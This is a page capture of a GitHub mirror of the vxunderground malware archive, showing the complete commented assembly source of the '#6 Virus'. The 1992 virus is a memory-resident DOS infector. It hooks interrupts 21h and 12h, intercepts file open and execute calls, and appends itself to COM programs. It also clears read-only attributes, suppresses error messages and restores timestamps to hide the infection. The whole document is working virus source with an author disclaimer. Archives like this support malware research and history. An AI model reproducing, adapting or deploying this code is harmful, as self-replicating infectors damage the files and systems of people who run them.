mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
326 lines
6.6 KiB
NASM
326 lines
6.6 KiB
NASM
;*****************************************************************************
|
|
; #6 Virus *
|
|
; *
|
|
; Assembled with Tasm 2.5 *
|
|
; (c) 1992 Trident/Dark Helmet, The Netherlands *
|
|
; *
|
|
; The author(s) take(s) no responsibility for any damaged caused by *
|
|
; this virus. *
|
|
;*****************************************************************************
|
|
|
|
.RADIX 16
|
|
virus SEGMENT
|
|
MODEL SMALL
|
|
ASSUME cs:virus, ds:virus, es:virus
|
|
ORG 100h
|
|
|
|
len EQU OFFSET last - begin
|
|
|
|
dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of
|
|
; viruscode.
|
|
begin: CALL start ; make a call to
|
|
; push the IP on the
|
|
; stack.
|
|
start: POP bp ; get the IP of the
|
|
; stack.
|
|
SUB bp,108h ; adjust BP (=IP)
|
|
; for offset of DATA.
|
|
|
|
restore: MOV di,0100h ; copy the original
|
|
LEA si,ds:[carrier_begin+bp] ; host begin code back.
|
|
MOV cx,05h
|
|
REP MOVSB
|
|
|
|
check: MOV ah,0a0h ; check if virus
|
|
INT 21h ; allready resident.
|
|
CMP ax,8654h
|
|
JE end_virus
|
|
|
|
memory: MOV ax,cs ; DS = Memory Control
|
|
DEC ax ; Blok (MCB).
|
|
MOV ds,ax
|
|
CMP BYTE PTR ds:[0000],5ah ; check first byte if
|
|
JNE abort ; last MCB.
|
|
MOV ax,ds:[0003] ; decrease memory size.
|
|
SUB ax,40
|
|
MOV ds:[0003],AX
|
|
|
|
PUSH cs ; restore ds.
|
|
POP ds
|
|
|
|
install: MOV bx,ax ; ES point where
|
|
MOV ax,es ; to copy virus in
|
|
ADD ax,bx ; memory.
|
|
MOV es,ax
|
|
|
|
MOV cx,len ; copy virus to
|
|
LEA si,ds:[begin+bp] ; memory.
|
|
LEA di,es:0105 ; offset = 105
|
|
REP MOVSB
|
|
MOV [virus_segment+bp],es ; store virus_segment
|
|
|
|
PUSH cs ; restore es
|
|
POP es
|
|
|
|
hook_vectors: CLI
|
|
|
|
MOV ax,3521h ; hook int 21h
|
|
INT 21h
|
|
MOV ds,[virus_segment+bp]
|
|
MOV old_21h,bx
|
|
MOV old_21h+2,es
|
|
MOV dx,offset main_virus
|
|
MOV ax,2521h
|
|
INT 21h
|
|
|
|
MOV ax,3512h ; hook int 12h
|
|
INT 21h
|
|
MOV old_12h,bx
|
|
MOV old_12h+2,es
|
|
MOV dx,offset new_12h
|
|
MOV ax,2512h
|
|
INT 21h
|
|
|
|
STI
|
|
|
|
abort: MOV ax,cs ; restore ds,es
|
|
MOV ds,ax
|
|
MOV es,ax
|
|
|
|
end_virus: MOV bx,0100h ; jump to begin host
|
|
PUSH bx
|
|
XOR bx,bx
|
|
XOR bp,bp
|
|
XOR ax,ax
|
|
XOR cx,cx
|
|
RET
|
|
|
|
;*****************************************************************************
|
|
; *
|
|
; This part will intercept the interuptvectors and copy itself to *
|
|
; other host programs *
|
|
; *
|
|
;*****************************************************************************
|
|
|
|
main_virus: PUSHF
|
|
CMP ah,0a0h ; check if virus calls
|
|
JNE new_21h ; and return id.
|
|
MOV ax,8654h
|
|
POPF
|
|
IRET
|
|
|
|
new_21h: PUSH ds ; new interupt 21
|
|
PUSH es ; routine
|
|
PUSH di
|
|
PUSH si
|
|
PUSH ax
|
|
PUSH bx
|
|
PUSH cx
|
|
PUSH dx
|
|
PUSH sp
|
|
PUSH bp
|
|
|
|
check_open: CMP ah,3dh ; check if a file is
|
|
JNE check_exec ; being opened
|
|
JMP chk_com
|
|
|
|
check_exec: CMP ax,04b00h ; check if a file is
|
|
JNE continu ; executed
|
|
JMP chk_com
|
|
|
|
continu: POP bp
|
|
POP sp
|
|
POP dx ; continu with
|
|
POP cx ; interrupt
|
|
POP bx
|
|
POP ax
|
|
POP si
|
|
POP di
|
|
POP es
|
|
POP ds
|
|
POPF
|
|
JMP DWORD PTR cs:[old_21h]
|
|
|
|
chk_com: MOV cs:[name_seg],ds
|
|
MOV cs:[name_off],dx
|
|
CLD ; check if extension
|
|
MOV di,dx ; is COM file
|
|
PUSH ds
|
|
POP es
|
|
MOV al,'.'
|
|
REPNE SCASB
|
|
CMP WORD PTR es:[di],'OC'
|
|
JNE continu
|
|
CMP WORD PTR es:[di+2],'M'
|
|
JNE continu
|
|
|
|
CMP WORD PTR es:[di-7],'MO' ; Check for
|
|
JNE error ; COMMAND.COM
|
|
CMP WORD PTR es:[di-5],'AM'
|
|
JNE error
|
|
CMP WORD PTR es:[di-3],'DN'
|
|
JE continu
|
|
|
|
error: CALL int24h ; take care of error
|
|
; messages
|
|
CALL set_atribute ; set atribute for
|
|
; writing
|
|
|
|
open_file: MOV ds,cs:[name_seg] ; open file
|
|
MOV dx,cs:[name_off]
|
|
MOV ax,3d02h
|
|
CALL do_int21h
|
|
JC close_file
|
|
PUSH cs
|
|
POP ds
|
|
MOV [handle],ax
|
|
MOV bx,ax
|
|
|
|
CALL get_date
|
|
|
|
check_infect: PUSH CS ; check if file
|
|
POP DS ; already infect
|
|
MOV BX,[handle]
|
|
MOV ah,3fh
|
|
MOV cx,05h
|
|
LEA dx,[carrier_begin]
|
|
CALL do_int21h
|
|
MOV al, BYTE PTR [carrier_begin]+3 ; look for
|
|
MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's
|
|
CMP ax,[initials]
|
|
JE save_date
|
|
|
|
get_lenght: MOV ax,4200h
|
|
CALL move_pointer
|
|
MOV ax,4202h
|
|
CALL move_pointer
|
|
SUB AX,03h
|
|
MOV [lenght_file],ax
|
|
|
|
CALL write_jmp ; write jump
|
|
; instruction.
|
|
CALL write_virus ; write virus
|
|
; body.
|
|
|
|
save_date: PUSH CS
|
|
POP DS
|
|
MOV bx,[handle]
|
|
MOV dx,[date]
|
|
MOV cx,[time]
|
|
MOV ax,5701h
|
|
CALL do_int21h
|
|
|
|
close_file: MOV bx,[handle] ; close file
|
|
MOV ah,3eh
|
|
CALL do_int21h
|
|
|
|
restore_int24h: MOV dx,cs:[old_24h] ; restore int24
|
|
MOV ds,cs:[old_24h+2] ; for critical
|
|
MOV ax,2524h ; error handling
|
|
CALL do_int21h
|
|
|
|
JMP continu
|
|
|
|
new_24h: MOV al,3
|
|
IRET
|
|
|
|
new_12h: JMP DWORD PTR cs:[old_12h]
|
|
SUB ax,50
|
|
IRET
|
|
|
|
;*****************************************************************************
|
|
|
|
move_pointer: PUSH cs
|
|
POP ds
|
|
MOV bx,[handle]
|
|
XOR cx,cx
|
|
XOR dx,dx
|
|
CALL do_int21h
|
|
RET
|
|
|
|
do_int21h: PUSHF
|
|
CALL DWORD PTR cs:[old_21h]
|
|
RET
|
|
|
|
write_jmp: PUSH CS
|
|
POP DS
|
|
|
|
MOV ax,4200h ; write jump
|
|
CALL move_pointer ; instruction
|
|
MOV ah,40h
|
|
MOV cx,01h
|
|
LEA dx,[jump]
|
|
CALL do_int21h
|
|
|
|
MOV ah,40h ; write offset of
|
|
MOV cx,02h ; jump
|
|
LEA dx,[lenght_file]
|
|
CALL do_int21h
|
|
|
|
MOV ah,40h ; write mark for
|
|
MOV cx,02h ; infection
|
|
LEA dx,[initials]
|
|
CALL do_int21h
|
|
RET
|
|
|
|
write_virus: PUSH CS
|
|
POP DS
|
|
|
|
MOV ax,4202h ; write main
|
|
CALL move_pointer ; virus body
|
|
MOV ah,40 ; at end of
|
|
MOV cx,len ; program
|
|
MOV dx,105h
|
|
CALL do_int21h
|
|
RET
|
|
|
|
get_date: MOV ax,5700h
|
|
CALL do_int21h
|
|
PUSH cs
|
|
POP ds
|
|
MOV [date],dx
|
|
MOV [time],cx
|
|
RET
|
|
|
|
int24h: MOV ax,3524h
|
|
CALL do_int21h
|
|
MOV cs:[old_24h],bx
|
|
MOV cs:[old_24h+2],es
|
|
MOV dx,offset new_24h
|
|
PUSH CS
|
|
POP DS
|
|
MOV AX,2524h
|
|
CALL do_int21h
|
|
RET
|
|
|
|
set_atribute: MOV ax,4300h ; get atribute
|
|
MOV ds,cs:[name_seg]
|
|
MOV dx,cs:[name_off]
|
|
CALL do_int21h
|
|
|
|
AND cl,0feh ; set atribute
|
|
MOV ax,4301h
|
|
CALL do_int21h
|
|
RET
|
|
|
|
;*****************************************************************************
|
|
|
|
text db '#6 Virus, Trident/The Netherlands 1992'
|
|
old_12h dw 00h,00h
|
|
old_21h dw 00h,00h
|
|
old_24h dw 00h,00h
|
|
carrier_begin db 090h,0cdh,020h,086h,054h
|
|
jump db 0e9h
|
|
name_seg dw ?
|
|
name_off dw ?
|
|
virus_segment dw ?
|
|
handle dw ?
|
|
lenght_file dw ?
|
|
date dw ?
|
|
time dw ?
|
|
initials dw 5486h
|
|
last db 090h
|
|
|
|
virus ends
|
|
end dummy
|